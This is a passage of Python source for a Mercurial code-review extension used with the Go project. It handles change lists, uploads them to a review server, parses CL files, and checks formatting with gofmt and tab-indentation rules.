            s += "\t\t" + f + "\n"
        typecheck(s, str)
        return s

    def Flush(self, ui, repo):
        """Write the CL to disk (atomically via a '!' temp file) and, when it
        is already on the web and owned by us, push metadata to the server."""
        if self.name == "new":
            self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
        dir = CodeReviewDir(ui, repo)
        path = dir + '/cl.' + self.name
        f = open(path+'!', "w")
        f.write(self.DiskText())
        f.close()
        # Windows cannot rename over an existing file; remove it first.
        if sys.platform == "win32" and os.path.isfile(path):
            os.remove(path)
        os.rename(path+'!', path)
        if self.web and not self.copied_from:
            EditDesc(self.name, desc=self.desc,
                reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
                private=self.private)

    def Delete(self, ui, repo):
        """Remove the CL's file from the repository's codereview directory."""
        dir = CodeReviewDir(ui, repo)
        os.unlink(dir + "/cl." + self.name)

    def Subject(self):
        """Email subject: first description line, truncated, with CL number."""
        s = line1(self.desc)
        if len(s) > 60:
            s = s[0:55] + "..."
        if self.name != "new":
            s = "code review %s: %s" % (self.name, s)
        typecheck(s, str)
        return s

    def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
        """Upload the CL's metadata and diffs to the code review server.

        Creates the server issue when self.name is "new" (adopting the
        server-assigned number), optionally triggers the review mail, and
        finishes by flushing local state to disk."""
        if not self.files and not creating:
            ui.warn("no files in change list\n")
        if ui.configbool("codereview", "force_gofmt", True) and gofmt:
            CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
        set_status("uploading CL metadata + diffs")
        os.chdir(repo.root)
        form_fields = [
            ("content_upload", "1"),
            ("reviewers", JoinComma(self.reviewer)),
            ("cc", JoinComma(self.cc)),
            ("description", self.desc),
            ("base_hashes", ""),
        ]
        if self.name != "new":
            form_fields.append(("issue", self.name))
        vcs = None
        # We do not include files when creating the issue,
        # because we want the patch sets to record the repository
        # and base revision they are diffs against. We use the patch
        # set message for that purpose, but there is no message with
        # the first patch set. Instead the message gets used as the
        # new CL's overall subject. So omit the diffs when creating
        # and then we'll run an immediate upload.
        # This has the effect that every CL begins with an empty "Patch set 1".
        if self.files and not creating:
            vcs = MercurialVCS(upload_options, ui, repo)
            data = vcs.GenerateDiff(self.files)
            files = vcs.GetBaseFiles(data)
            # Oversized diffs are uploaded patch-by-patch later instead.
            if len(data) > MAX_UPLOAD_SIZE:
                uploaded_diff_file = []
                form_fields.append(("separate_patches", "1"))
            else:
                uploaded_diff_file = [("data", "data.diff", data)]
        else:
            uploaded_diff_file = [("data", "data.diff", emptydiff)]
        if vcs and self.name != "new":
            form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + getremote(ui, repo, {}).path))
        else:
            # First upload sets the subject for the CL itself.
            form_fields.append(("subject", self.Subject()))
        ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
        response_body = MySend("/upload", body, content_type=ctype)
        # Response: first line is the status message (ending in the issue
        # URL); second line is the patchset id; remaining lines list patches.
        patchset = None
        msg = response_body
        lines = msg.splitlines()
        if len(lines) >= 2:
            msg = lines[0]
            patchset = lines[1].strip()
            patches = [x.split(" ", 1) for x in lines[2:]]
        if response_body.startswith("Issue updated.") and quiet:
            pass
        else:
            ui.status(msg + "\n")
        set_status("uploaded CL metadata + diffs")
        if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
            raise util.Abort("failed to update issue: " + response_body)
        # Adopt the server-assigned issue number (the URL's last component).
        issue = msg[msg.rfind("/")+1:]
        self.name = issue
        if not self.url:
            self.url = server_url_base + self.name
        if not uploaded_diff_file:
            set_status("uploading patches")
            patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
        if vcs:
            set_status("uploading base files")
            vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
        if send_mail:
            set_status("sending mail")
            MySend("/" + issue + "/mail", payload="")
        self.web = True
        set_status("flushing changes to disk")
        self.Flush(ui, repo)
        return

    def Mail(self, ui, repo):
        """Post the 'please review' message for this CL and mark it mailed."""
        pmsg = "Hello " + JoinComma(self.reviewer)
        if self.cc:
            pmsg += " (cc: %s)" % (', '.join(self.cc),)
        pmsg += ",\n"
        pmsg += "\n"
        repourl = getremote(ui, repo, {}).path
        if not self.mailed:
            pmsg += "I'd like you to review this change to\n" + repourl + "\n"
        else:
            pmsg += "Please take another look.\n"
        typecheck(pmsg, str)
        PostMessage(ui, self.name, pmsg, subject=self.Subject())
        self.mailed = True
        self.Flush(ui, repo)
def GoodCLName(name):
    """Return a truthy match object when name is a well-formed (all-digit)
    CL number, else None."""
    typecheck(name, str)
    match = re.match("^[0-9]+$", name)
    return match
def ParseCL(text, name):
    """Parse the on-disk/editor CL text format into a CL object.

    Returns (cl, 0, '') on success, or (None, lineno, errmsg) when the
    text is malformed. Recognized sections are the keys of `sections`.
    """
    typecheck(text, str)
    typecheck(name, str)
    sname = None       # name of the section currently being collected
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
        'Mailed': '',
        'Private': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        # '#' lines are comments.
        if line != '' and line[0] == '#':
            continue
        # Indented (or blank) lines continue the current section.
        if line == '' or line[0] == ' ' or line[0] == '\t':
            if sname == None and line != '':
                return None, lineno, 'text outside section'
            if sname != None:
                sections[sname] += line + '\n'
            continue
        # Otherwise the line must start a new "Name: [value]" section.
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'
    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()
    cl = CL(name)
    if sections['Author']:
        cl.copied_from = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # Strip trailing '#' comments from file entries.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        line = line.strip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    if sections['Mailed'] != 'False':
        # Odd default, but avoids spurious mailings when
        # reading old CLs that do not have a Mailed: line.
        # CLs created with this update will always have
        # Mailed: False on disk.
        cl.mailed = True
    if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
        cl.private = True
    if cl.desc == '<enter description here>':
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    """Split s on commas (each optionally followed by spaces); [] for blank input."""
    typecheck(s, str)
    stripped = s.strip()
    if not stripped:
        return []
    return re.split(", *", stripped)
def CutDomain(s):
    """Strip an e-mail domain: 'user@host' -> 'user'; plain names pass through."""
    typecheck(s, str)
    return s.split('@', 1)[0]
def JoinComma(l):
    """Join a list of strings with ", ", type-checking every element first."""
    for item in l:
        typecheck(item, str)
    return ", ".join(l)
def ExceptionDetail():
    """Describe the exception currently being handled as 'TypeName: message'.

    Must be called from inside an except block (reads sys.exc_info()).
    """
    exc_type, exc_value = sys.exc_info()[:2]
    s = str(exc_type)
    # str() of an exception class looks like "<type 'X'>" or "<class 'X'>";
    # peel that wrapper off to leave just the name.
    for prefix in ("<type '", "<class '"):
        if s.startswith(prefix) and s.endswith("'>"):
            s = s[len(prefix):-2]
            break
    arg = str(exc_value)
    if arg:
        s += ": " + arg
    return s
def IsLocalCL(ui, repo, name):
    # True if a valid CL name with a cl.<name> file in the codereview dir.
    # NOTE(review): CodeReviewDir() already ends in '/', so this builds a
    # doubled slash; harmless on POSIX, but LoadCL omits the extra '/'.
    return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
    """Load CL `name`, merging the local cl.<name> file (if any) with
    metadata fetched from the code review server when web=True.

    Returns (cl, err); err is '' on success.
    """
    typecheck(name, str)
    set_status("loading CL " + name)
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        set_status("getting issue metadata from web")
        d = JSONGet(ui, "/api/" + name + "?messages=true")
        set_status(None)
        if d is None:
            return None, "cannot load CL %s from server" % (name,)
        # Sanity-check that the server answered for the issue we asked about.
        if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
            return None, "malformed response loading CL data from code review server"
        cl.dict = d
        cl.reviewer = d.get('reviewers', [])
        cl.cc = d.get('cc', [])
        if cl.local and cl.copied_from and cl.desc:
            # local copy of CL written by someone else
            # and we saved a description. use that one,
            # so that committers can edit the description
            # before doing hg submit.
            pass
        else:
            cl.desc = d.get('description', "")
        cl.url = server_url_base + name
        cl.web = True
        cl.private = d.get('private', False) != False
    set_status("loaded CL " + name)
    return cl, ''
# Most recent status message; displayed periodically by StatusThread.
global_status = None

def set_status(s):
    # Record the current activity (or None to go quiet).
    # print >>sys.stderr, "\t", time.asctime(), s
    global global_status
    global_status = s
class StatusThread(threading.Thread):
    # Background thread that periodically prints global_status to stderr,
    # so that long-running hg commands show signs of life.
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # pause a reasonable amount of time before
        # starting to display status messages, so that
        # most hg commands won't ever see them.
        time.sleep(30)
        # now show status every 15 seconds
        while True:
            # Align wakeups to 15-second wall-clock boundaries.
            time.sleep(15 - time.time() % 15)
            s = global_status
            if s is None:
                continue
            if s == "":
                s = "(unknown status)"
            print >>sys.stderr, time.asctime(), s
def start_status_thread():
    # Launch the background status printer.
    t = StatusThread()
    t.setDaemon(True)  # allowed to exit if t is still running
    t.start()
class LoadCLThread(threading.Thread):
    # Worker thread that loads one CL file (dir/f); the result is left
    # in self.cl (None on failure) for the caller to collect after join().
    def __init__(self, ui, repo, dir, f, web):
        threading.Thread.__init__(self)
        self.ui = ui
        self.repo = repo
        self.dir = dir
        self.f = f
        self.web = web
        self.cl = None
    def run(self):
        # File names look like "cl.123456"; strip the "cl." prefix.
        cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
        if err != '':
            self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
            return
        self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
    """Return a dict mapping CL name -> CL for every cl.* file in the
    codereview directory, loading them in parallel threads."""
    dir = CodeReviewDir(ui, repo)
    m = {}
    files = [f for f in os.listdir(dir) if f.startswith('cl.')]
    if not files:
        return m
    active = []
    first = True
    for f in files:
        t = LoadCLThread(ui, repo, dir, f, web)
        t.start()
        if web and first:
            # first request: wait in case it needs to authenticate
            # otherwise we get lots of user/password prompts
            # running in parallel.
            t.join()
            if t.cl:
                m[t.cl.name] = t.cl
            first = False
        else:
            active.append(t)
    for t in active:
        t.join()
        if t.cl:
            m[t.cl.name] = t.cl
    return m
# Find repository root.  On error, ui.warn and return None
def RepoDir(ui, repo):
    url = repo.url();
    if not url.startswith('file:'):
        ui.warn("repository %s is not in local file system\n" % (url,))
        return None
    # Strip the "file:" scheme and any trailing slash.
    url = url[5:]
    if url.endswith('/'):
        url = url[:-1]
    typecheck(url, str)
    return url
# Find (or make) code review directory.  On error, ui.warn and return None
def CodeReviewDir(ui, repo):
    """Return the path (with trailing '/') of .hg/codereview/, creating it
    if needed."""
    dir = RepoDir(ui, repo)
    if dir == None:
        return None
    dir += '/.hg/codereview/'
    if not os.path.isdir(dir):
        try:
            os.mkdir(dir, 0700)
        except:
            ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
            return None
    typecheck(dir, str)
    return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs.  Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
    """Expand each leading tab of line into 8 spaces; the rest is untouched."""
    body = line.lstrip('\t')
    ntabs = len(line) - len(body)
    return ' ' * (8 * ntabs) + body
# Strip maximal common leading white space prefix from text
def StripCommon(text):
    """Remove the longest whitespace prefix shared by all non-blank lines
    of text (after tab expansion); also trims leading blank lines and
    collapses trailing blank lines to at most one newline."""
    typecheck(text, str)
    # First pass: compute the common prefix ws across non-blank lines.
    ws = None
    for line in text.split('\n'):
        line = line.rstrip()
        if line == '':
            continue
        line = TabsToSpaces(line)
        white = line[:len(line)-len(line.lstrip())]
        if ws == None:
            ws = white
        else:
            # Longest common prefix of white and ws.
            common = ''
            for i in range(min(len(white), len(ws))+1):
                if white[0:i] == ws[0:i]:
                    common = white[0:i]
            ws = common
        if ws == '':
            break
    if ws == None:
        return text
    # Second pass: strip ws from each line.
    t = ''
    for line in text.split('\n'):
        line = line.rstrip()
        line = TabsToSpaces(line)
        if line.startswith(ws):
            line = line[len(ws):]
        # Skip blank lines before the first content line.
        if line == '' and t == '':
            continue
        t += line + '\n'
    # Collapse trailing blank lines.
    while len(t) >= 2 and t[-2:] == '\n\n':
        t = t[:-1]
    typecheck(t, str)
    return t
# Indent text with indent.
def Indent(text, indent):
    """Return text with indent prepended to every line."""
    typecheck(text, str)
    typecheck(indent, str)
    out = ''.join(indent + line + '\n' for line in text.split('\n'))
    typecheck(out, str)
    return out
# Return the first line of l
def line1(text):
    # First line only, without the trailing newline.
    typecheck(text, str)
    return text.split('\n')[0]
# Boilerplate prepended to the CL text opened in the user's editor.
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions

# Get effective change nodes taking into account applied MQ patches
def effective_revpair(repo):
    # With MQ patches applied, diff against qparent; otherwise fall back
    # to the default revision pair ('qparent' raises when MQ is unused).
    try:
        return cmdutil.revpair(repo, ['qparent'])
    except:
        return cmdutil.revpair(repo, None)
# Return list of changed files in repository that match pats.
# Warn about patterns that did not match.
def matchpats(ui, repo, pats, opts):
    """Run repo.status for pats; returns the 7-tuple
    (modified, added, removed, deleted, unknown, ignored, clean)."""
    matcher = cmdutil.match(repo, pats, opts)
    node1, node2 = effective_revpair(repo)
    modified, added, removed, deleted, unknown, ignored, clean = repo.status(node1, node2, matcher, ignored=True, clean=True, unknown=True)
    return (modified, added, removed, deleted, unknown, ignored, clean)
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, opts, taken=None):
    """Return the sorted list of modified/added/removed files matching pats,
    excluding files claimed by the CLs in `taken` (a file -> CL dict)."""
    taken = taken or {}
    # Run each pattern separately so that we can warn about
    # patterns that didn't do anything useful.
    for p in pats:
        modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
        redo = False
        # Offer to hg add unknown files and hg remove deleted ones.
        for f in unknown:
            promptadd(ui, repo, f)
            redo = True
        for f in deleted:
            promptremove(ui, repo, f)
            redo = True
        if redo:
            modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
        for f in modified + added + removed:
            if f in taken:
                ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
        if not modified and not added and not removed:
            ui.warn("warning: %s did not match any modified files\n" % (p,))
    # Again, all at once (eliminates duplicates)
    modified, added, removed = matchpats(ui, repo, pats, opts)[:3]
    l = modified + added + removed
    l.sort()
    if taken:
        l = Sub(l, taken.keys())
    return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
    # Only modified + added (removed files no longer exist on disk).
    modified, added = matchpats(ui, repo, pats, opts)[:2]
    l = modified + added
    l.sort()
    return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
    """Map each file claimed by a local CL to that CL (file -> CL dict)."""
    taken = {}
    for cl in LoadAllCL(ui, repo, web=False).values():
        for f in cl.files:
            taken[f] = cl
    return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
    # Convenience wrapper: changed files minus those already in some CL.
    return ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
def Sub(l1, l2):
    """Set difference as a list: elements of l1 not present in l2 (order kept)."""
    kept = []
    for item in l1:
        if item not in l2:
            kept.append(item)
    return kept
def Add(l1, l2):
    """Sorted union: l1 plus the elements of l2 not already in l1."""
    merged = l1 + [item for item in l2 if item not in l1]
    merged.sort()
    return merged
def Intersect(l1, l2):
    """Elements of l1 that also appear in l2, preserving l1's order."""
    common = []
    for item in l1:
        if item in l2:
            common.append(item)
    return common
def getremote(ui, repo, opts):
    """Return the remote (default-path) repository object."""
    # save $http_proxy; creating the HTTP repo object will
    # delete it in an attempt to "help"
    proxy = os.environ.get('http_proxy')
    source = hg.parseurl(ui.expandpath("default"), None)[0]
    try:
        remoteui = hg.remoteui # hg 1.6
    except:
        # Older Mercurial keeps remoteui in cmdutil.
        remoteui = cmdutil.remoteui
    other = hg.repository(remoteui(repo, opts), source)
    if proxy is not None:
        # Restore the proxy setting clobbered above.
        os.environ['http_proxy'] = proxy
    return other
def Incoming(ui, repo, opts):
    # Changesets present on the remote but not yet pulled locally.
    _, incoming, _ = findcommonincoming(repo, getremote(ui, repo, opts))
    return incoming
# Conventional first line of a CL description: "pkg: summary",
# "tag release.x"/"release.x"/"weekly.x", "fix build", or "undo CL ...".
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'

# Warning shown when the description does not match desc_re.
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptremove(ui, repo, f):
    # Offer to hg remove a file that was deleted on disk.
    if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
        if commands.remove(ui, repo, 'path:'+f) != 0:
            ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
    # Offer to hg add a file that hg does not know about.
    if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
        if commands.add(ui, repo, 'path:'+f) != 0:
            ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
    """Open cl in the user's editor, re-prompting until the text parses and
    the file list is sane; on success the edits are copied into cl.

    Returns '' on success, or an error message.
    """
    set_status(None)	# do not show status
    s = cl.EditorText()
    while True:
        s = ui.edit(s, ui.username())
        clx, line, err = ParseCL(s, cl.name)
        if err != '':
            if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
                return "change list not modified"
            continue
        # Check description.
        if clx.desc == '':
            if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
                continue
        elif re.search('<enter reason for undo>', clx.desc):
            if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
                continue
        elif not re.match(desc_re, clx.desc.split('\n')[0]):
            if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
                continue
        # Check file list for files that need to be hg added or hg removed
        # or simply aren't understood.
        pats = ['path:'+f for f in clx.files]
        modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, pats, {})
        files = []
        for f in clx.files:
            if f in modified or f in added or f in removed:
                files.append(f)
                continue
            if f in deleted:
                promptremove(ui, repo, f)
                files.append(f)
                continue
            if f in unknown:
                promptadd(ui, repo, f)
                files.append(f)
                continue
            if f in ignored:
                ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
                continue
            if f in clean:
                ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
                files.append(f)
                continue
            # Not known to hg at all: keep plain files (with a warning),
            # drop directories and nonexistent paths.
            p = repo.root + '/' + f
            if os.path.isfile(p):
                ui.warn("warning: %s is a file but not known to hg\n" % (f,))
                files.append(f)
                continue
            if os.path.isdir(p):
                ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
                continue
            ui.warn("error: %s does not exist; omitting\n" % (f,))
        clx.files = files
        # Commit the accepted edits back into cl.
        cl.desc = clx.desc
        cl.reviewer = clx.reviewer
        cl.cc = clx.cc
        cl.files = clx.files
        cl.private = clx.private
        break
    return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
    """Resolve command-line pats into a CL: either load the named CL, or
    build a new one from the changed files.  Returns (cl, err)."""
    if len(pats) > 0 and GoodCLName(pats[0]):
        if len(pats) != 1:
            return None, "cannot specify change number and file names"
        if opts.get('message'):
            return None, "cannot use -m with existing CL"
        cl, err = LoadCL(ui, repo, pats[0], web=True)
        if err != "":
            return None, err
    else:
        cl = CL("new")
        cl.local = True
        cl.files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
        if not cl.files:
            return None, "no files changed"
    # Merge -r/--cc options and the default CC list into the CL.
    if opts.get('reviewer'):
        cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
    if opts.get('cc'):
        cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
    if defaultcc:
        cl.cc = Add(cl.cc, defaultcc)
    if cl.name == "new":
        if opts.get('message'):
            cl.desc = opts.get('message')
        else:
            err = EditCL(ui, repo, cl)
            if err != '':
                return None, err
    return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=None, opts=None, globbed=False, default='relpath'):
    """cmdutil.match wrapper: expand each '@NNNNNN' pattern into
    'path:' patterns for that CL's files, then defer to the original."""
    taken = []   # the @-patterns we consumed
    files = []   # files accumulated from the referenced CLs
    pats = pats or []
    opts = opts or {}
    for p in pats:
        if p.startswith('@'):
            taken.append(p)
            clname = p[1:]
            if not GoodCLName(clname):
                raise util.Abort("invalid CL name " + clname)
            cl, err = LoadCL(repo.ui, repo, clname, web=False)
            if err != '':
                raise util.Abort("loading CL " + clname + ": " + err)
            if not cl.files:
                raise util.Abort("no files in CL " + clname)
            files = Add(files, cl.files)
    pats = Sub(pats, taken) + ['path:'+f for f in files]
    return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
    """Return path relative to cwd when path lies inside cwd; otherwise
    return path unchanged.

    Paths use '/' separators (Mercurial's convention).
    """
    n = len(cwd)
    # The len(path) > n guard prevents an IndexError when path == cwd,
    # and also keeps "/a/bc" from matching cwd "/a/b".
    if path.startswith(cwd) and len(path) > n and path[n] == '/':
        return path[n+1:]
    return path
def CheckFormat(ui, repo, files, just_warn=False):
    # Run all source-format checks: gofmt for Go files, tab indentation
    # for C/assembly files.  With just_warn, failures warn instead of abort.
    set_status("running gofmt")
    CheckGofmt(ui, repo, files, just_warn)
    CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
    """Run 'gofmt -l' on the repo's Go files in `files`; abort (or warn,
    with just_warn) if any would be reformatted."""
    files = [f for f in files if (f.startswith('src/') or f.startswith('test/bench/')) and f.endswith('.go')]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    # Only files that actually exist on disk.
    files = [f for f in files if os.access(f, 0)]
    if not files:
        return
    try:
        cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
        cmd.stdin.close()
    except:
        raise util.Abort("gofmt: " + ExceptionDetail())
    # NOTE(review): reading stdout to EOF before stderr could deadlock if
    # gofmt fills the stderr pipe buffer first; communicate() would be safer.
    data = cmd.stdout.read()
    errors = cmd.stderr.read()
    cmd.wait()
    set_status("done with gofmt")
    if len(errors) > 0:
        ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
        return
    if len(data) > 0:
        # gofmt -l lists the files whose formatting would change.
        msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise util.Abort(msg)
    return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
    """Complain about C/header/assembly files under src/ that indent with
    spaces instead of tabs; abort (or warn, with just_warn) if any do."""
    files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    files = [f for f in files if os.access(f, 0)]
    badfiles = []
    for f in files:
        try:
            fp = open(f, 'r')
            try:
                for line in fp:
                    # Four leading spaces is enough to complain about,
                    # except that some Plan 9 code uses four spaces as the label indent,
                    # so allow that.  (The literal below is four spaces, matching
                    # this comment; a single space would flag nearly every file.)
                    if line.startswith('    ') and not re.match('    [A-Za-z0-9_]+:', line):
                        badfiles.append(f)
                        break
            finally:
                # Close explicitly rather than leaking the handle.
                fp.close()
        except:
            # ignore cannot open file, etc.
            pass
    if len(badfiles) > 0:
        msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise util.Abort(msg)
    return
#######################################################################
# Mercurial commands
# every command must take a ui and and repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
    """create, edit or delete a change list

    Create, edit or delete a change list.
    A change list is a group of files to be reviewed and submitted together,
    plus a textual description of the change.
    Change lists are referred to by simple alphanumeric names.

    Changes must be reviewed before they can be submitted.

    In the absence of options, the change command opens the
    change list for editing in the default editor.

    Deleting a change with the -d or -D flag does not affect
    the contents of the files listed in that change. To revert
    the files listed in a change, use

    hg revert @123456

    before running hg change -d 123456.
    """
    if missing_codereview:
        return missing_codereview

    dirty = {}  # CLs (keys) that need to be flushed back to disk
    if len(pats) > 0 and GoodCLName(pats[0]):
        # Editing an existing CL.
        name = pats[0]
        if len(pats) != 1:
            return "cannot specify CL name and file patterns"
        pats = pats[1:]
        cl, err = LoadCL(ui, repo, name, web=True)
        if err != '':
            return err
        if not cl.local and (opts["stdin"] or not opts["stdout"]):
            return "cannot change non-local CL " + name
    else:
        # Creating a new CL from the changed files matching pats.
        if repo[None].branch() != "default":
            return "cannot run hg change outside default branch"
        name = "new"
        cl = CL("new")
        dirty[cl] = True
        files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))

    if opts["delete"] or opts["deletelocal"]:
        # -d deletes on the server and locally; -D deletes only locally.
        if opts["delete"] and opts["deletelocal"]:
            return "cannot use -d and -D together"
        flag = "-d"
        if opts["deletelocal"]:
            flag = "-D"
        if name == "new":
            return "cannot use "+flag+" with file patterns"
        if opts["stdin"] or opts["stdout"]:
            return "cannot use "+flag+" with -i or -o"
        if not cl.local:
            return "cannot change non-local CL " + name
        if opts["delete"]:
            if cl.copied_from:
                return "original author must delete CL; hg change -D will remove locally"
            PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
            EditDesc(cl.name, closed=True, private=cl.private)
        cl.Delete(ui, repo)
        return

    if opts["stdin"]:
        # Read the CL text from stdin instead of an editor.
        s = sys.stdin.read()
        clx, line, err = ParseCL(s, name)
        if err != '':
            return "error parsing change list: line %d: %s" % (line, err)
        if clx.desc is not None:
            cl.desc = clx.desc;
            dirty[cl] = True
        if clx.reviewer is not None:
            cl.reviewer = clx.reviewer
            dirty[cl] = True
        if clx.cc is not None:
            cl.cc = clx.cc
            dirty[cl] = True
        if clx.files is not None:
            cl.files = clx.files
            dirty[cl] = True
        if clx.private != cl.private:
            cl.private = clx.private
            dirty[cl] = True

    if not opts["stdin"] and not opts["stdout"]:
        # Interactive edit in the user's editor.
        if name == "new":
            cl.files = files
        err = EditCL(ui, repo, cl)
        if err != "":
            return err
        dirty[cl] = True

    for d, _ in dirty.items():
        name = d.name
        d.Flush(ui, repo)
        if name == "new":
            d.Upload(ui, repo, quiet=True)

    if opts["stdout"]:
        ui.write(cl.EditorText())
    elif opts["pending"]:
        ui.write(cl.PendingText())
    elif name == "new":
        if ui.quiet:
            ui.write(cl.name)
        else:
            ui.write("CL created: " + cl.url + "\n")
    return
def code_login(ui, repo, **opts):
    """log in to code review server

    Logs in to the code review server, saving a cookie in
    a file in your home directory.
    """
    if missing_codereview:
        return missing_codereview
    # MySend(None) triggers the authentication handshake without
    # sending an actual request.
    MySend(None)
def clpatch(ui, repo, clname, **opts):
    """import a patch from the code review server

    Imports a patch from the code review server into the local client.
    If the local client has already modified any of the files that the
    patch modifies, this command will refuse to apply the patch.

    Submitting an imported patch will keep the original author's
    name as the Author: line but add your own name to a Committer: line.
    """
    if repo[None].branch() != "default":
        return "cannot run hg clpatch outside default branch"
    return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
    """undo the effect of a CL

    Creates a new CL that undoes an earlier CL.
    After creating the CL, opens the CL text for editing so that
    you can add the reason for the undo to the description.
    """
    if repo[None].branch() != "default":
        return "cannot run hg undo outside default branch"
    return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
    """apply a CL to the release branch

    Creates a new CL copying a previously committed change
    from the main branch to the release branch.
    The current client must either be clean or already be in
    the release branch.

    The release branch must be created by starting with a
    clean client, disabling the code review plugin, and running:

    hg update weekly.YYYY-MM-DD
    hg branch release-branch.rNN
    hg commit -m 'create release-branch.rNN'
    hg push --new-branch

    Then re-enable the code review plugin.

    People can test the release branch by running

    hg update release-branch.rNN

    in a clean client. To return to the normal tree,

    hg update default

